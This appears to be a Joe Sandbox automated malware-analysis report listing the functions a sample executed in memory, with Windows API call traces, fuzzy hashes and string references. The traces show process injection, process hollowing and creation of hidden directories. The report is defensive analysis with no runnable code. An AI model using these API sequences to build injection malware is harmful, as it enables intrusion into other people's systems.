Instruction Fuzzy Hash: 2D4183B6600208BFEF169F68CC48BDEBFB9FF84744F554058EA44AB154DB709650CB94

Function 011A47F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 011A492D
nt: , xrefs: 011A4939
ie: , xrefs: 011A48B1
-Age, xrefs: 011A4933
Cook, xrefs: 011A48AB

Memory Dump Source

Source File: 0000001D.00000002.3360094382.00000000011A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_11a0000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: 6c83cbebc8eb518ed32b7d0727f88c016cd8d71cef4f10f802ea748da911eb94
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: 004192B6600208BFEF169FA4CC88BEEBFB9FF84704F154058EA44AB150DB709650CB94

Analysis Process: bin.exePID: 2976, Parent PID: 4004COMMON

Executed Functions

Function 001C0E21 Relevance: 6.1, APIs: 4, Instructions: 57
injectionmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B
CreateRemoteThread.KERNELBASE(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001C0EB1

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction ID: 9e1f878eac78179e63507154ab3e59f021aece4aaf68afa768676749f8b9bd9e
Opcode Fuzzy Hash: 73a63156dcc240dfd57774f03aa3cf0bcc04f9305a5d11e370546c377752cf19
Instruction Fuzzy Hash: 6A119A32240204FBFF215F21CC85FAA3B69EF84B54F188014FE48BE595D770E560CAA8

Function 021505BC Relevance: 6.1, APIs: 4, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,00000008,00000000), ref: 021505DA
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000008,00000000), ref: 021505FB
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0215062B
NtWriteVirtualMemory.NTDLL(?,?,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008,00000000), ref: 0215064D

Part of subcall function 02150655: NtWriteVirtualMemory.NTDLL(?,?,02150F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0215066F

Memory Dump Source

Source File: 0000001E.00000002.2599868439.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2150000_bin.jbxd

Similarity

API ID: Memory$VirtualWrite$ProcessRead
String ID:
API String ID: 2369493071-0
Opcode ID: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
Instruction ID: 057d85d168950b252355cf8aac724bf97aeccbbd83dc4d69a715b4683cf7d263
Opcode Fuzzy Hash: 9a28ce18db67336f958333131009207115c9ceade32e8881fd5c4d8fef1e65b4
Instruction Fuzzy Hash: CA111BB0380745BBE7209F45CCC4F96B766FF0C300F548124AB185A292CB71B9A4DB95

Function 001C15E4 Relevance: 1.5, APIs: 1, Instructions: 23
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001C160C

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
Instruction ID: f89654c994a3303b23e412f08d7b43ad8504f33b7d29e365df13ca103ac73e30
Opcode Fuzzy Hash: 494cc3cd07106d3d7f3194012e93b0bf6877a4aa10ef2c29222b9a26aca699df
Instruction Fuzzy Hash: F2F05436100109EFCF068F90DA94C9A3B32FF5D358B048159FE1A2A2A0C772A970EB58

Function 02150655 Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(?,?,02150F7B,00000008,00000000,?,00000008,00000000,?,00000004,00000000,?,00000004,00000000,?,00000008), ref: 0215066F

Memory Dump Source

Source File: 0000001E.00000002.2599868439.0000000002150000.00000040.00001000.00020000.00000000.sdmp, Offset: 02150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2150000_bin.jbxd

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
Instruction ID: e88afff3d61980a56802db103e3dfb6d8113bf48b7cbd1a96aa272a1c5aa0c31
Opcode Fuzzy Hash: a671850407bd8e8fc185180ee1c1a6aa0a778c320929f09fd5b50919388c79fd
Instruction Fuzzy Hash: 1CF0AE74284611EFD328DF84C984B64B7A2FF5C310F158499E9998B3A1CB30A940CB45

Function 001C16C0 Relevance: 1.5, APIs: 1, Instructions: 17
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtResumeThread.NTDLL(?,?), ref: 001C16FD

Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Process$AllocMemoryResumeThreadVirtualWow64Write
String ID:
API String ID: 308677811-0
Opcode ID: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
Instruction ID: 50c68c5dfab682ea1a1f8b0f0c987396ec09a66bf25883eb63b730f6d608dfef
Opcode Fuzzy Hash: 9b38a38d15973d4ff94adcbc0bc85e50b42519dcf60a688b996de47f15e28dd2
Instruction Fuzzy Hash: 12E09A75100104BAEF029F54C999F4A3B70AB25358F044455EC09AE1C6C3F59524CB6C

Function 0214097F Relevance: 18.1, APIs: 12, Instructions: 120
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00001388), ref: 0214099A
RtlExitUserThread.NTDLL(00000000), ref: 021409A2
OpenMutexA.KERNEL32(001F0001,00000000), ref: 021409C2
GetStartupInfoA.KERNEL32(00000000), ref: 021409DA

Part of subcall function 02140A1A: CreateProcessA.KERNEL32(00000000,02140A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 02140A21
Part of subcall function 02140A1A: GetThreadContext.KERNEL32(?,00000000), ref: 02140A49
Part of subcall function 02140A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02140A74
Part of subcall function 02140A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,021459C8,00000000,00000000,00000002), ref: 02140AB9
Part of subcall function 02140A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02140AE7
Part of subcall function 02140A1A: ResumeThread.KERNEL32(?), ref: 02140AF7
Part of subcall function 02140A1A: Sleep.KERNEL32(000003E8), ref: 02140B07
Part of subcall function 02140A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02140B1E

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
String ID:
API String ID: 1099281029-0
Opcode ID: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
Instruction ID: c7c993d1c5668a210b8ff73b5b5b6419dd4ffa9bbc27daaa090734784bb80bb0
Opcode Fuzzy Hash: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
Instruction Fuzzy Hash: 1A416E71680218AFEB269F60CC85FA973ACEF44744F1401A5BB49FE0D5DB70A690CE69

Function 001C097F Relevance: 18.1, APIs: 12, Instructions: 120
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 001C099A
RtlExitUserThread.NTDLL(00000000), ref: 001C09A2
OpenMutexA.KERNEL32(001F0001,00000000), ref: 001C09C2
GetStartupInfoA.KERNEL32(00000000), ref: 001C09DA

Part of subcall function 001C0A1A: CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
Part of subcall function 001C0A1A: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
Part of subcall function 001C0A1A: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
Part of subcall function 001C0A1A: DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
Part of subcall function 001C0A1A: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
Part of subcall function 001C0A1A: ResumeThread.KERNEL32(?), ref: 001C0AF7
Part of subcall function 001C0A1A: Sleep.KERNEL32(000003E8), ref: 001C0B07
Part of subcall function 001C0A1A: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
String ID:
API String ID: 1099281029-0
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 482e49ecec93f6808493f0189dbbc3643221c1c1eb3ea815b0c0a648cf82ffd9
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 84413071640214AFEF129F60CC85FA977ACEF54B44F040199BB49FE0D6DB709A90CA65

Function 02143FDE Relevance: 6.0, APIs: 4, Instructions: 26
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,02143FD4,0000000A,?,00000000,0000000A), ref: 02143FFE
Sleep.KERNELBASE(000003E8,00000000,?,02143FD4,0000000A,?,00000000,0000000A), ref: 02144020
Sleep.KERNELBASE(000007D0), ref: 02144030
Sleep.KERNELBASE(00000BB8), ref: 02144040

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: d2508506a3db3d0b0c18c91c355d6a00c47bf7d728c49fa506ae27a218957f68
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: D2F039705C8280EFFB507BB08C89B8D36A99F01709F0400A0EA4EBF495CF78A4608E72

Function 001C3FDE Relevance: 6.0, APIs: 4, Instructions: 26
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C3FFE
Sleep.KERNELBASE(000003E8,00000000,?,001C3FD4,0000000A,?,00000000,0000000A), ref: 001C4020
Sleep.KERNELBASE(000007D0), ref: 001C4030
Sleep.KERNELBASE(00000BB8), ref: 001C4040

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: 90a0306340f54f8a0a8555a1ee633c2a62b65fb2f3a667207fde47de25335585
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: A1F01C7058C280D7EB507BA08C9AF8D36A89F31709F041098BB49AE496CF78C560DE72

Function 001C1386 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Virtual$Protect$Alloc
String ID:
API String ID: 2541858876-0
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: aee6498fc1534bf5843544c719c366106a18b629b188e7960a7d370974955569
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 5521CD31940256AFDB12DF78C848FACBBB5AF15710F458229F955AF2D1E730E810CB94

Function 001C1528 Relevance: 1.6, APIs: 1, Instructions: 51
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001C1522,00000006,?,00000000), ref: 001C152D

Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA

Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,00000040,?,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13B3
Part of subcall function 001C1386: VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C13C8
Part of subcall function 001C1386: VirtualProtect.KERNELBASE(?,00000020,?,001C1434,?,?,?,?,?,?,?,?,001C155C,001C1439,00000000,001C1439), ref: 001C142F

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Virtual$Protect$AddressAllocLibraryLoadProc
String ID:
API String ID: 2821516111-0
Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction ID: 84603d99140c77a5ab07f23fff341f14d22a0cbe777f466f71f0401ea30cd6a0
Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction Fuzzy Hash: 6511C1B2404614AEEF03AF20C5C4DAA73ECFE51708B450A6EAD85EF44EEF709154CAE5

Non-executed Functions

Function 02142DF8 Relevance: 10.6, APIs: 7, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataReleaseSignatureVerify
String ID:
API String ID: 2975711244-0
Opcode ID: 74f399d408830fdb48f850e18acc577a4850fe241935dd629d5f7770cec88c7c
Instruction ID: a4f1312321eb152d4ef59b1c8091752020c81634f9c2e0a0577efed4f5199756
Opcode Fuzzy Hash: 74f399d408830fdb48f850e18acc577a4850fe241935dd629d5f7770cec88c7c
Instruction Fuzzy Hash: 0E414E71544218AFEF224F20CC85FE9B7B9AF04B04F1406D5BA89AE095DBB199D0DF94

Function 02142ECB Relevance: 10.6, APIs: 7, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,02142E9C,0000002F,?,00000000,00000001,F0000000), ref: 02142EDC
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 02142F25
CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 02142F3F
CryptVerifySignatureA.ADVAPI32(?,00000000,00000085,?,00000000,00000000), ref: 02142F5F
CryptDestroyHash.ADVAPI32(?), ref: 02142F6D
CryptDestroyKey.ADVAPI32(?), ref: 02142F79
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02142F87

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataReleaseSignatureVerify
String ID:
API String ID: 2975711244-0
Opcode ID: c5cb8e877015542dfdc52913968891db5105916fdbb510e43f81ac8c12f77a0c
Instruction ID: fb5deb02ee4b247e3a4412ec69d05e28a0e429fe7e6feeb67b9fb242a5a1a36c
Opcode Fuzzy Hash: c5cb8e877015542dfdc52913968891db5105916fdbb510e43f81ac8c12f77a0c
Instruction Fuzzy Hash: 9811C631644114ABEF221F20CC85BD97B79AF54704F144294BE8ABD0A4DBB19AE09F58

Function 02140E21 Relevance: 6.1, APIs: 4, Instructions: 57injectionmemorythreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(0000094C,00000000,021459C8,00003000,00000040,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E47
WriteProcessMemory.KERNEL32(0000094C,02140000,00000000,021459C8,00000000,?,02140DC9,00000000,0000094C,00000000), ref: 02140E65
IsWow64Process.KERNEL32(0000094C,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E7B
CreateRemoteThread.KERNEL32(0000094C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02140EB1

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Process$AllocCreateMemoryRemoteThreadVirtualWow64Write
String ID:
API String ID: 3578747408-0
Opcode ID: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
Instruction ID: a000fd37d854cfdff69b41fbe31a5c103cd54cb14546f602f8ed463a47e6ce35
Opcode Fuzzy Hash: 079751ffdfe3eadcbe87efa349abbd0bf3a7fcc1013202ef83eaf6d3d040f129
Instruction Fuzzy Hash: C5118F32140204FFFF109F15CC45F9A3B69EF84754F244051FE48BE595D771A560CAA8

Function 02140688 Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(0214067F,00000009,?,00000000), ref: 0214068D

Part of subcall function 02140CDD: GetProcAddress.KERNEL32(00000000,021404B1), ref: 02140CEA

Part of subcall function 021406CE: lstrcat.KERNEL32(00000000,021406C5), ref: 021406DD
Part of subcall function 021406CE: lstrcmpiA.KERNEL32(?,00000000), ref: 021406F7
Part of subcall function 021406CE: Sleep.KERNEL32(00001388), ref: 0214070A
Part of subcall function 021406CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214072B
Part of subcall function 021406CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 0214073D
Part of subcall function 021406CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214075E
Part of subcall function 021406CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 02140770
Part of subcall function 021406CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 02140791
Part of subcall function 021406CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 021407A3
Part of subcall function 021406CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 021407B7
Part of subcall function 021406CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 021407FE
Part of subcall function 021406CE: Sleep.KERNEL32(00001388), ref: 0214081D

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction ID: 3e945f246d53b4bcc5bf1a59e219d1dc8683f1a4b8b7664f4d57160cd3200111
Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction Fuzzy Hash: B1410FB25442149FDB176BA08C88FAA77BCEF44704F4505A9BB89EF055EF309680CEA5

Function 001C0688 Relevance: 19.6, APIs: 13, Instructions: 120
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001C067F,00000009,?,00000000), ref: 001C068D

Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA

Part of subcall function 001C06CE: lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
Part of subcall function 001C06CE: lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C070A
Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
Part of subcall function 001C06CE: CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
Part of subcall function 001C06CE: SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
Part of subcall function 001C06CE: VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
Part of subcall function 001C06CE: VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
Part of subcall function 001C06CE: Sleep.KERNEL32(00001388), ref: 001C081D

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
String ID:
API String ID: 3164464694-0
Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction ID: 6916e961ec7af8ef0e99d5548a14004a71d42b8846935f748d6844fc744d3216
Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
Instruction Fuzzy Hash: 25411DB2404214DFDB176BA08889FAA73ACEF54B00F4505ADBB85EF056DF309690CEA5

Function 021406CE Relevance: 18.1, APIs: 12, Instructions: 97sleepstringmemoryCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,021406C5), ref: 021406DD
lstrcmpiA.KERNEL32(?,00000000), ref: 021406F7
Sleep.KERNEL32(00001388), ref: 0214070A
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214072B
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 0214073D
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 0214075E
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 02140770
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 02140791
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 021407A3
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 021407B7
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 021407FE
Sleep.KERNEL32(00001388), ref: 0214081D

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction ID: 10466fd20799e2928110b70732f5d5c3223c5bd0f9620a420f4d30213afe4071
Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction Fuzzy Hash: 493101B25402149FDF166BA0CC89FAA73BCEF44B05F4504A9BB89EF055DF309680CEA5

Function 001C06CE Relevance: 18.1, APIs: 12, Instructions: 97sleepstringmemoryCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,001C06C5), ref: 001C06DD
lstrcmpiA.KERNEL32(?,00000000), ref: 001C06F7
Sleep.KERNEL32(00001388), ref: 001C070A
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C072B
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C073D
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C075E
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C0770
CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001C0791
SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001C07A3
VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001C07B7
VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001C07FE
Sleep.KERNEL32(00001388), ref: 001C081D

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
String ID:
API String ID: 2622802024-0
Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction ID: 7ea33d55d254b196ccdd85eefc5e787c536d3095197ddd6fe78dffc3f5513c5a
Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
Instruction Fuzzy Hash: 6A31FDB2500214DFDB176BA08C89FAA73BCEF54B00F4504ADBB85EE055DF309690CEA5

Function 02142666 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(02142656,00000010,?,?,00000000,00000104), ref: 0214266B
